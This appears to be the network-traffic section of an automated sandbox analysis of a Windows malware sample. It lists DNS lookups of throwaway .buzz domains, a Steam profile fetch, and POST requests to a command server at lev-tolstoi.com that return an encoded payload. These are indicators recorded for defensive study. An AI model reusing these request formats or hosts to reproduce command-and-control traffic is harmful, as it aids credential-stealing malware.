                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257183075 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257189035 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257224083 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257261038 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257361889 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257373095 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257390022 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257395029 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.387984037 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388039112 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388106108 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388403893 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388412952 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.694468975 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.694621086 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.695947886 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.695967913 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.696234941 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.697365999 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.697509050 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.697536945 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741566896 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741733074 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741782904 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741894007 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741916895 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.840836048 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.840895891 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.840970993 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.841264963 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.841279030 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.098997116 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.099147081 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.100358009 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.100374937 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.100622892 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104562998 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104682922 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104707956 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104787111 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.151335955 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927125931 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927241087 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927391052 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927561045 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927582026 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294397116 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294442892 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294562101 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294935942 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294946909 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.553368092 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.553637028 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.555104017 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.555120945 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.555444956 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557029963 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557029963 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557085037 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557169914 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557178974 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.530864954 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.530981064 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.531039000 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.531101942 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.531121969 CET44349737172.67.157.254192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.882503986 CET53612701.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.147675037 CET5233553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.292951107 CET53523351.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 28, 2024 09:58:54.873140097 CET | 192.168.2.6 | 1.1.1.1 | 0xbb76 | Standard query (0) | cashfuzysao.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.018065929 CET | 192.168.2.6 | 1.1.1.1 | 0x863 | Standard query (0) | prisonyfork.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.160830021 CET | 192.168.2.6 | 1.1.1.1 | 0x5f23 | Standard query (0) | rebuildeso.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.305197001 CET | 192.168.2.6 | 1.1.1.1 | 0x77d4 | Standard query (0) | scentniej.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.466978073 CET | 192.168.2.6 | 1.1.1.1 | 0x60c0 | Standard query (0) | inherineau.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.609798908 CET | 192.168.2.6 | 1.1.1.1 | 0xaf44 | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.752379894 CET | 192.168.2.6 | 1.1.1.1 | 0x83d4 | Standard query (0) | appliacnesot.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.898293018 CET | 192.168.2.6 | 1.1.1.1 | 0xa596 | Standard query (0) | hummskitnj.buzz | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:56.040796995 CET | 192.168.2.6 | 1.1.1.1 | 0x51ae | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:58.743247032 CET | 192.168.2.6 | 1.1.1.1 | 0xc0e6 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:59:08.147675037 CET | 192.168.2.6 | 1.1.1.1 | 0xa303 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 28, 2024 09:58:55.012514114 CET | 1.1.1.1 | 192.168.2.6 | 0xbb76 | Name error (3) | cashfuzysao.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.157594919 CET | 1.1.1.1 | 192.168.2.6 | 0x863 | Name error (3) | prisonyfork.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.301918983 CET | 1.1.1.1 | 192.168.2.6 | 0x5f23 | Name error (3) | rebuildeso.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.445703030 CET | 1.1.1.1 | 192.168.2.6 | 0x77d4 | Name error (3) | scentniej.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.606548071 CET | 1.1.1.1 | 192.168.2.6 | 0x60c0 | Name error (3) | inherineau.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.749193907 CET | 1.1.1.1 | 192.168.2.6 | 0xaf44 | Name error (3) | screwamusresz.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:55.892694950 CET | 1.1.1.1 | 192.168.2.6 | 0x83d4 | Name error (3) | appliacnesot.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:56.037426949 CET | 1.1.1.1 | 192.168.2.6 | 0xa596 | Name error (3) | hummskitnj.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:56.179886103 CET | 1.1.1.1 | 192.168.2.6 | 0x51ae | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:58.882503986 CET | 1.1.1.1 | 192.168.2.6 | 0xc0e6 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:58:58.882503986 CET | 1.1.1.1 | 192.168.2.6 | 0xc0e6 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:59:08.292951107 CET | 1.1.1.1 | 192.168.2.6 | 0xa303 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 28, 2024 09:59:08.292951107 CET | 1.1.1.1 | 192.168.2.6 | 0xa303 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | 3524 | C:\Users\user\Desktop\5Z19n7XRT1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:58:57 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-12-28 08:58:58 UTC | 1905 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sat, 28 Dec 2024 08:58:58 GMT
    Content-Length: 35121
    Connection: close
    Set-Cookie: sessionid=378308b36cb3d3ce49665561; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 08:58:58 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 08:58:58 UTC | 10097 | IN | Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
    Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 08:58:58 UTC | 10545 | IN | Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
    Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | 3524 | C:\Users\user\Desktop\5Z19n7XRT1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:59:00 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
2024-12-28 08:59:00 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-28 08:59:00 UTC | 1123 | IN | HTTP/1.1 200 OK
    Date: Sat, 28 Dec 2024 08:59:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=th1r09gsf52i99cu59kr1nvtbq; expires=Wed, 23 Apr 2025 02:45:39 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JUGHjB7Roc6raq%2BJT9jFvfDEDDMSui%2BUmVE6hPDLMESQ2KLQiCotrU30XRLHw%2FIXERZiSUbBx6E8SEryNWCgeHesktXgp7IIsGFckpvKzsDZx7gzUMTh2vThwHrFLMgDPg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f905a0f48810f46-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1476&rtt_var=565&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1918528&cwnd=226&unsent_bytes=0&cid=348f2807292a933d&ts=737&x=0"
                                                                                                                                                                                                                                                                        2024-12-28 08:59:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                                        2024-12-28 08:59:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49716 | 104.21.66.86 | 443 | 3524 | C:\Users\user\Desktop\5Z19n7XRT1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:59:02 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 74
Host: lev-tolstoi.com
2024-12-28 08:59:02 UTC | 74 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2024-12-28 08:59:03 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:59:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=folt37pugqsqi6mt72hod9b7h2; expires=Wed, 23 Apr 2025 02:45:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8TqXKXC%2B8FZUSY7RPF7o8Vy69sTWHT5LM%2FX8FMFBqDOEMwq9yW4%2BZQ2q4ewLmCjw0YJK6X%2F5%2FUf%2BoS%2BzT0gIChF8zsrnJhYF%2FhubfWLi3i67ZvppUsPu3BywGnm4FNKp7s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f905a1cfeaf4299-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1569&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=973&delivery_rate=1780487&cwnd=251&unsent_bytes=0&cid=37ff4a1b876cdfd0&ts=783&x=0"
2024-12-28 08:59:03 UTC | 236 | IN | Data Raw: 63 34 64 0d 0a 65 68 68 67 50 79 42 46 76 59 6b 52 48 63 47 73 5a 6d 34 4e 70 70 57 45 58 62 34 46 79 6c 69 4d 51 5a 47 4f 47 7a 62 4c 78 74 63 42 4f 68 59 64 47 6e 47 52 71 32 4a 34 34 35 59 53 48 48 6a 44 75 61 59 38 32 69 66 77 50 75 30 74 34 75 73 33 46 4c 32 72 39 55 42 2b 41 56 4e 54 49 4a 47 72 64 47 58 6a 6c 6a 30 56 4c 38 50 37 70 6d 65 63 59 4b 41 36 37 53 33 7a 37 33 42 5a 75 36 71 30 45 6e 51 48 56 30 55 6d 32 65 68 39 63 4b 54 4a 41 77 39 6e 79 50 7a 70 4e 64 4d 6e 35 6e 72 70 4f 37 4f 30 4f 58 75 75 73 72 59 33 65 52 4e 55 41 6a 69 52 38 6a 4e 34 72 34 35 63 54 47 7a 44 39 2b 67 37 32 6d 36 69 4d 4f 51 6c 38 75 70 78 52 71 4b 67 76 78 4a 36 42 46 5a 50 4c 38 33 6c 64 33 65 76 7a 77 6b
Data Ascii: c4dehhgPyBFvYkRHcGsZm4NppWEXb4FyliMQZGOGzbLxtcBOhYdGnGRq2J445YSHHjDuaY82ifwPu0t4us3FL2r9UB+AVNTIJGrdGXjlj0VL8P7pmecYKA67S3z73BZu6q0EnQHV0Um2eh9cKTJAw9nyPzpNdMn5nrpO7O0OXuusrY3eRNUAjiR8jN4r45cTGzD9+g72m6iMOQl8upxRqKgvxJ6BFZPL83ld3evzwk
2024-12-28 08:59:03 UTC | 1369 | IN | Data Raw: 50 4c 34 71 33 34 53 65 63 50 2b 68 70 33 43 44 69 2f 57 78 5a 75 61 4c 31 42 7a 51 62 48 55 55 72 6e 37 4d 7a 64 36 2f 41 41 51 39 67 77 2f 62 6d 4c 64 4e 6e 71 7a 4c 6d 4a 2f 6e 6a 64 6c 75 6e 72 72 49 51 63 77 56 53 52 53 2f 5a 35 48 41 2f 37 59 34 44 46 43 2b 63 74 38 59 76 33 32 53 38 4e 2f 39 6a 37 4b 4a 67 46 4b 36 6f 39 55 41 36 42 46 4e 44 4b 74 2f 35 65 33 53 6f 79 78 59 48 5a 73 6e 36 35 6a 4c 57 61 4b 73 36 36 53 6e 35 34 33 4e 51 70 4b 6d 7a 47 48 70 43 45 77 49 67 78 36 73 72 50 34 44 4c 46 41 74 6a 30 72 58 63 66 38 4d 70 73 58 72 70 4c 37 4f 30 4f 56 79 73 70 37 59 54 64 51 46 56 53 54 58 66 2b 58 56 79 70 74 77 43 43 57 48 4f 39 50 51 31 30 6d 47 72 4d 2b 55 71 39 75 74 39 46 4f 66 6b 73 67 41 36 57 68 31 6a 4b 74 54 6e 65 57 69 6a 6a 68
Data Ascii: PL4q34SecP+hp3CDi/WxZuaL1BzQbHUUrn7Mzd6/AAQ9gw/bmLdNnqzLmJ/njdlunrrIQcwVSRS/Z5HA/7Y4DFC+ct8Yv32S8N/9j7KJgFK6o9UA6BFNDKt/5e3SoyxYHZsn65jLWaKs66Sn543NQpKmzGHpCEwIgx6srP4DLFAtj0rXcf8MpsXrpL7O0OVysp7YTdQFVSTXf+XVyptwCCWHO9PQ10mGrM+Uq9ut9FOfksgA6Wh1jKtTneWijjh
2024-12-28 08:59:03 UTC | 1369 | IN | Data Raw: 2b 2f 51 7a 31 6d 47 6e 4e 2b 4a 6a 76 61 78 2b 54 4f 6e 38 39 54 4a 35 46 6c 35 49 5a 65 72 6f 66 58 47 6b 32 45 51 54 49 64 32 33 34 54 4f 63 50 2b 67 33 37 79 76 31 2f 6e 5a 5a 71 71 71 37 46 33 38 4e 56 55 49 6e 30 75 35 33 64 4b 6a 4e 43 51 68 39 7a 76 66 75 4f 74 31 74 6f 6e 71 67 59 2f 54 30 4f 51 7a 70 6c 61 49 54 4f 44 64 65 54 43 6e 59 2f 54 4e 67 37 64 64 45 43 32 4f 45 72 36 59 79 31 47 4b 74 4e 65 38 70 2f 65 6c 7a 57 4b 47 71 74 67 70 31 42 6c 31 4f 4c 39 58 6d 66 58 75 72 78 77 38 48 61 63 54 32 37 48 2b 53 4a 36 38 69 72 6e 75 7a 32 48 35 59 70 4b 76 33 4c 58 6b 4d 55 30 55 78 6e 2f 51 39 5a 75 50 4a 43 45 77 33 68 50 76 76 50 39 64 74 72 44 72 70 4c 76 62 76 66 6c 65 6b 6f 37 38 57 66 51 5a 52 53 79 72 5a 36 33 52 37 70 74 77 42 42 57 50
Data Ascii: +/Qz1mGnN+Jjvax+TOn89TJ5Fl5IZerofXGk2EQTId234TOcP+g37yv1/nZZqqq7F38NVUIn0u53dKjNCQh9zvfuOt1tonqgY/T0OQzplaITODdeTCnY/TNg7ddEC2OEr6Yy1GKtNe8p/elzWKGqtgp1Bl1OL9XmfXurxw8HacT27H+SJ68irnuz2H5YpKv3LXkMU0Uxn/Q9ZuPJCEw3hPvvP9dtrDrpLvbvfleko78WfQZRSyrZ63R7ptwBBWP
